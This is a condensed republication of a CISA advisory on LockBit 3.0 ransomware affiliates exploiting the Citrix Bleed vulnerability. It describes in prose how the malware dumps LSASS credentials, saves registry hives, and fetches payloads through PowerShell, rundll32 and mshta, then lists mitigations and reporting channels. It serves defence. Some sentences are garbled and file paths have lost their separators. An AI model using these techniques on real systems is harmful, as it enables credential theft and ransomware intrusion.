These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures and indicators of compromise to help organizations protect against ransomware. Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPs. Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication, leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control and Gateway appliances. Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks. Malware identified in this campaign is generated beginning with the execution of a PowerShell script which concatenates two base64 strings together, converts them to bytes, and writes them to the designated file path. The resulting file is then executed by the PowerShell script using rundll32. Digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software. LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring, Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently. Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7. Below, are CISA developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service process memory to disk, and attempt to establish sessions via Windows Remote Management. This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named 'z.txt' located in the path C:WindowsTasks. Next, a.bat runs three makecab commands to create three cabinet files from the previously mentioned saved registry hives and one file named C:UsersPublica. This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:UsersPublic. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:WindowsTasks. This file is a Python script called a.py that attempts to leverage WinRM to establish a session. MITIGATIONS. These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. The authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 2023-4966 and LockBit 3.0 ransomware & ransomware affiliates. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. RESOURCES REPORTING. The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center at ic3.
This Cyber News was published on www.cisa.gov. Publication date: Thu, 30 Nov 2023 21:55:14 +0000